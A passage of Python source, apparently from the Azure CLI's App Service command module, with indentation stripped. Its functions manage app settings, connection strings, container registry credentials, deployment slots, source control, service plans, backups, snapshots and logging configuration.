slot_cfg_names.app_setting_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings, slot, client)
return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
azure_storage_accounts.properties.pop(custom_id, None)
if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.remove(custom_id)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
return result.properties
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and sys.platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
slot_cfg_names = slot_cfg_names or []
return [{'name': p,
'value': app_settings[p],
'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)]
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
settings=None, slot=None, slot_settings=None):
from azure.mgmt.web.models import ConnStringValueTypePair
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
for name_value in settings + slot_settings:
# split at the first '=', connection string should not have '=' in the name
conn_string_name, value = name_value.split('=', 1)
if value[0] in ["'", '"']: # strip away the quots used as separators
value = value[1:-1]
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
type=connection_string_type)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings, slot, client)
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
slot_cfg_names.connection_string_names += new_slot_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
conn_strings.properties.pop(setting_name, None)
if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
slot_cfg_names.connection_string_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings, slot, client)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
websites_enable_app_service_storage=None, docker_registry_server_password=None,
multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if (not docker_registry_server_user and not docker_registry_server_password and
docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
parsed = urlparse(docker_registry_server_url)
registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
try:
docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if websites_enable_app_service_storage:
settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
update_app_settings(cmd, resource_group_name, name, settings, slot)
settings = get_app_settings(cmd, resource_group_name, name, slot)
if docker_custom_image_name is not None:
_add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
if multicontainer_config_file and multicontainer_config_type:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
elif multicontainer_config_file or multicontainer_config_type:
logger.warning('Must change both settings --multicontainer-config-file FILE --multicontainer-config-type TYPE')
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
docker_registry_server_password=None, slot=None):
return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
docker_custom_image_name, docker_registry_server_user, None,
docker_registry_server_password, multicontainer_config_type=None,
multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
from azure.mgmt.containerregistry import ContainerRegistryManagementClient
from azure.cli.core.commands.parameters import get_resources_in_subscription
client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
result = [item for item in result if item.name.lower() == registry_name]
if not result or len(result) > 1:
raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name))
resource_group_name = parse_resource_id(result[0].id)['resource_group']
registry = client.get(resource_group_name, registry_name)
if registry.admin_user_enabled: # pylint: disable=no-member
cred = client.list_credentials(resource_group_name, registry_name)
return cred.username, cred.passwords[0].value
raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
"credentials or run 'az acr update -n {} --admin-enabled true' to enable "
"admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
_delete_linux_fx_version(cmd, resource_group_name, name, slot)
delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config, slot))
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config=None, slot=None):
result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES]
fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
if fx_version:
added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME',
'value': fx_version}
result.append(added_image_name)
if show_multicontainer_config:
decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
'value': decoded_value}
result.append(decoded_image_name)
return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]:
settings[x] = None
return settings
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
from azure.mgmt.web.models import HostNameBinding
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
binding = HostNameBinding(site_name=webapp.name)
if slot is None:
return client.web_apps.create_or_update_host_name_binding(resource_group_name=resource_group_name,
name=webapp.name, host_name=hostname,
host_name_binding=binding)
return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name=resource_group_name,
name=webapp.name, host_name=hostname,
slot=slot, host_name_binding=binding)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'list_host_name_bindings', slot))
for r in result:
r.name = r.name.split('/')[-1]
return result
def get_external_ip(cmd, resource_group_name, webapp_name):
SslState = cmd.get_models('SslState')
# logics here are ported from portal
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
if webapp.hosting_environment_profile:
address = client.app_service_environments.list_vips(
resource_group_name, webapp.hosting_environment_profile.name)
if address.internal_ip_address:
ip_address = address.internal_ip_address
else:
vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
ip_address = vip.virtual_ip if vip else address.service_ip_address
else:
ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
Site, SiteConfig, NameValuePair = cmd.get_models('Site', 'SiteConfig', 'NameValuePair')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, webapp)
site_config = get_site_configs(cmd, resource_group_name, webapp, None)
if not site:
raise CLIError("'{}' app doesn't exist".format(webapp))
if 'functionapp' in site.kind:
raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
slot_def.site_config = SiteConfig()
# if it is a Windows Container site, at least pass the necessary
# app settings to perform the container image validation:
if configuration_source and site_config.windows_fx_version:
# get settings from the source
clone_from_prod = configuration_source.lower() == webapp.lower()
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings', src_slot)
settings = []
for k, v in app_settings.properties.items():
if k in ("DOCKER_REGISTRY_SERVER_USERNAME", "DOCKER_REGISTRY_SERVER_PASSWORD",
"DOCKER_REGISTRY_SERVER_URL"):
settings.append(NameValuePair(name=k, value=v))
slot_def.site_config = SiteConfig(app_settings=settings)
poller = client.web_apps.begin_create_or_update_slot(resource_group_name, webapp, site_envelope=slot_def, slot=slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None):
Site = cmd.get_models('Site')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' function app doesn't exist".format(name))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
poller = client.web_apps.begin_create_or_update_slot(resource_group_name, name, site_envelope=slot_def, slot=slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None):
clone_from_prod = configuration_source.lower() == webapp.lower()
site_config = get_site_configs(cmd, resource_group_name, webapp,
None if clone_from_prod else configuration_source)
_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_configuration', slot, site_config)
# slot create doesn't clone over the app-settings and connection-strings, so we do it here
# also make sure slot settings don't get propagated.
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings',
src_slot)
for a in slot_cfg_names.app_setting_names or []:
app_settings.properties.pop(a, None)
connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_connection_strings',
src_slot)
for a in slot_cfg_names.connection_string_names or []:
connection_strings.properties.pop(a, None)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_application_settings',
app_settings, slot, client)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_connection_strings',
connection_strings, slot, client)
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
manual_integration=None, git_token=None, slot=None, github_action=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
from azure.mgmt.web.models import SiteSourceControl, SourceControl
if git_token:
sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
client.update_source_control('GitHub', sc)
source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'), is_git_hub_action=bool(github_action))
# SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
for i in range(5):
try:
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'begin_create_or_update_source_control',
slot, source_control)
return LongRunningOperation(cmd.cli_ctx)(poller)
except Exception as ex: # pylint: disable=broad-except
import re
ex = ex_handler_factory(no_throw=True)(ex)
# for non server errors(50x), just throw; otherwise retry 4 times
if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
raise
logger.warning('retrying %s/4', i + 1)
time.sleep(5) # retry in a moment
def update_git_token(cmd, git_token=None):
'''
Update source control token cached in Azure app service. If no token is provided,
the command will clean up existing token.
'''
client = web_client_factory(cmd.cli_ctx)
from azure.mgmt.web.models import SourceControl
sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '')
return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
site_config = get_site_configs(cmd, resource_group_name, name, slot)
site_config.scm_type = 'LocalGit'
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update_configuration', slot, site_config)
return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
except CloudError as ex: # Because of bad spec, sdk throws on 200. We capture it here
if ex.status_code not in [200, 204]:
raise ex
def list_app_service_plans(cmd, resource_group_name=None):
client = web_client_factory(cmd.cli_ctx)
if resource_group_name is None:
plans = list(client.app_service_plans.list(detailed=True)) # enables querying "numberOfSites"
else:
plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
for plan in plans:
# prune a few useless fields
del plan.geo_region
del plan.subscription
return plans
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False,
app_service_environment=None, sku='B1', number_of_workers=None, location=None,
tags=None, no_wait=False):
HostingEnvironmentProfile, SkuDescription, AppServicePlan = cmd.get_models(
'HostingEnvironmentProfile', 'SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
_validate_asp_sku(app_service_environment, sku)
if is_linux and hyper_v:
raise MutuallyExclusiveArgumentError('Usage error: --is-linux and --hyper-v cannot be used together.')
client = web_client_factory(cmd.cli_ctx)
if app_service_environment:
if hyper_v:
raise ArgumentUsageError('Windows containers is not yet supported in app service environment')
ase_list = client.app_service_environments.list()
ase_found = False
ase = None
for ase in ase_list:
if ase.name.lower() == app_service_environment.lower() or ase.id.lower() == app_service_environment.lower():
ase_def = HostingEnvironmentProfile(id=ase.id)
location = ase.location
ase_found = True
break
if not ase_found:
err_msg = "App service environment '{}' not found in subscription.".format(app_service_environment)
raise ResourceNotFoundError(err_msg)
else: # Non-ASE
ase_def = None
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
# the api is odd on parameter naming, have to live with it for now
sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name,
per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def)
return sdk_no_wait(no_wait, client.app_service_plans.begin_create_or_update, name=name,
resource_group_name=resource_group_name, app_service_plan=plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None):
if number_of_workers is None and sku is None:
logger.warning('No update is done. Specify --sku and/or --number-of-workers.')
sku_def = instance.sku
if sku is not None:
sku = _normalize_sku(sku)
sku_def.tier = get_sku_name(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
instance.sku = sku_def
return instance
def show_plan(cmd, resource_group_name, name):
from azure.cli.core.commands.client_factory import get_subscription_id
client = web_client_factory(cmd.cli_ctx)
serverfarm_url_base = 'subscriptions/{}/resourceGroups/{}/providers/Microsoft.Web/serverfarms/{}?api-version={}'
subscription_id = get_subscription_id(cmd.cli_ctx)
serverfarm_url = serverfarm_url_base.format(subscription_id, resource_group_name, name, client.DEFAULT_API_VERSION)
request_url = cmd.cli_ctx.cloud.endpoints.resource_manager + serverfarm_url
response = send_raw_request(cmd.cli_ctx, "GET", request_url)
return response.json()
def update_functionapp_app_service_plan(cmd, instance, sku=None, number_of_workers=None, max_burst=None):
instance = update_app_service_plan(instance, sku, number_of_workers)
if max_burst is not None:
if not is_plan_elastic_premium(cmd, instance):
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
instance.maximum_elastic_worker_count = max_burst
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances',
number_of_workers, min_val=0, max_val=20)
return update_app_service_plan(instance, sku, number_of_workers)
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups', slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
db_name=None, db_type=None,
db_connection_string=None, backup_name=None, slot=None):
BackupRequest = cmd.get_models('BackupRequest')
client = web_client_factory(cmd.cli_ctx)
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_request = BackupRequest(backup_name=backup_name,
storage_account_url=storage_account_url, databases=db_setting)
if slot:
return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
frequency=None, keep_at_least_one_backup=None,
retention_period_in_days=None, db_name=None,
db_connection_string=None, db_type=None, backup_name=None, slot=None):
BackupSchedule, BackupRequest = cmd.get_models('BackupSchedule', 'BackupRequest')
configuration = None
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
if not backup_name:
backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M'))
try:
configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
# No configuration set yet
if not all([storage_account_url, frequency, retention_period_in_days,
keep_at_least_one_backup]):
raise CLIError('No backup configuration found. A configuration must be created. ' +
'Usage: --container-url URL --frequency TIME --retention DAYS ' +
'--retain-one TRUE/FALSE')
# If arguments were not specified, use the values in the current backup schedule
if storage_account_url is None:
storage_account_url = configuration.storage_account_url
if retention_period_in_days is None:
retention_period_in_days = configuration.backup_schedule.retention_period_in_days
if keep_at_least_one_backup is None:
keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
else:
keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
if frequency:
# Parse schedule frequency
frequency_num, frequency_unit = _parse_frequency(cmd, frequency)
else:
frequency_num = configuration.backup_schedule.frequency_interval
frequency_unit = configuration.backup_schedule.frequency_unit
if configuration and configuration.databases:
db = configuration.databases[0]
db_type = db_type or db.database_type
db_name = db_name or db.name
db_connection_string = db_connection_string or db.connection_string
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
keep_at_least_one_backup=keep_at_least_one_backup,
retention_period_in_days=retention_period_in_days)
backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
enabled=True, storage_account_url=storage_account_url,
databases=db_setting)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
db_name=None, db_type=None, db_connection_string=None,
target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
RestoreRequest = cmd.get_models('RestoreRequest')
client = web_client_factory(cmd.cli_ctx)
storage_blob_name = backup_name
if not storage_blob_name.lower().endswith('.zip'):
storage_blob_name += '.zip'
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
restore_request = RestoreRequest(storage_account_url=storage_account_url,
blob_name=storage_blob_name, overwrite=overwrite,
site_name=target_name, databases=db_setting,
ignore_conflicting_host_names=ignore_hostname_conflict)
if slot:
return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name
source_resource_group=None, source_name=None, source_slot=None):
from azure.cli.core.commands.client_factory import get_subscription_id
SnapshotRecoverySource, SnapshotRestoreRequest = cmd.get_models('SnapshotRecoverySource', 'SnapshotRestoreRequest')
client = web_client_factory(cmd.cli_ctx)
recover_config = not restore_content_only
if all([source_resource_group, source_name]):
# Restore from source app to target app
sub_id = get_subscription_id(cmd.cli_ctx)
source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
"/providers/Microsoft.Web/sites/" + source_name
if source_slot:
source_id = source_id + "/slots/" + source_slot
source = SnapshotRecoverySource(id=source_id)
request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
if any([source_resource_group, source_name]):
raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
# Overwrite app with its own snapshot
request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(cmd, db_name, db_type, db_connection_string):
DatabaseBackupSetting = cmd.get_models('DatabaseBackupSetting')
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
if any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(cmd, frequency):
FrequencyUnit = cmd.get_models('FrequencyUnit')
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
if frequency_num < 0:
raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
def _get_deleted_apps_locations(cli_ctx):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
web_provider = client.providers.get('Microsoft.Web')
del_sites_resource = next((x for x in web_provider.resource_types if x.resource_type == 'deletedSites'), None)
if del_sites_resource:
return del_sites_resource.locations
return []
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
user = client.get_publishing_user()
result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
parsed = urlparse(result.repo_url)
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
def _get_scm_url(cmd, resource_group_name, name, slot=None):
from azure.mgmt.web.models import HostType
webapp = show_webapp(cmd, resource_group_name, name, slot=slot)
for host in webapp.host_name_ssl_states or []:
if host.host_type == HostType.repository:
return "https://{}".format(host.name)
# this should not happen, but throw anyway
raise ValueError('Failed to retrieve Scm Uri')
def get_publishing_user(cmd):
client = web_client_factory(cmd.cli_ctx)
return client.get_publishing_user()
def set_deployment_user(cmd, user_name, password=None):
'''
Update deployment credentials.(Note, all webapps in your subscription will be impacted)
'''
User = cmd.get_models('User')
client = web_client_factory(cmd.cli_ctx)
user = User(publishing_user_name=user_name)
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
return client.update_publishing_user(user)
def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'begin_list_publishing_credentials', slot)
return content.result()
def list_publish_profiles(cmd, resource_group_name, name, slot=None, xml=False):
import xmltodict
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_profile_xml_with_secrets', slot, {"format": "WebDeploy"})
full_xml = ''
for f in content:
full_xml += f.decode()
if not xml:
profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
converted = []
if not isinstance(profiles, list):
profiles = [profiles]
for profile in profiles:
new = {}
for key in profile:
# strip the leading '@' xmltodict put in for attributes
new[key.lstrip('@')] = profile[key]
converted.append(new)
return converted
cmd.cli_ctx.invocation.data['output'] = 'tsv'
return full_xml
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
settings = []
settings.append("DOCKER_ENABLE_CI=" + enable)
update_app_settings(cmd, resource_group_name, name, settings, slot)
return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
docker_enabled = False
for setting in settings:
if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
docker_enabled = True
break
cd_settings = {}
cd_settings['DOCKER_ENABLE_CI'] = docker_enabled
if docker_enabled:
credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
if credentials:
cd_url = credentials.scm_uri + '/docker/hook'
cd_settings['CI_CD_URL'] = cd_url
else:
cd_settings['CI_CD_URL'] = ''
return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
url = _get_url(cmd, resource_group_name, name, slot)
open_page_in_browser(url)
if logs:
get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
SslState = cmd.get_models('SslState')
site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
url = site.enabled_host_names[0] # picks the custom domain URL incase a domain is assigned
ssl_host = next((h for h in site.host_name_ssl_states
if h.ssl_state != SslState.disabled), None)
return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob suport
def config_diagnostics(cmd, resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
docker_container_logging=None, detailed_error_messages=None,
failed_request_tracing=None, slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
AzureBlobStorageApplicationLogsConfig, SiteLogsConfig,
HttpLogsConfig, FileSystemHttpLogsConfig,
EnabledConfig)
client = web_client_factory(cmd.cli_ctx)
# TODO: ensure we call get_site only once
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
location = site.location
application_logs = None
if application_logging:
fs_log = None
blob_log = None
level = level if application_logging != 'off' else False
level = True if level is None else level
if application_logging in ['filesystem', 'off']:
fs_log = FileSystemApplicationLogsConfig(level=level)
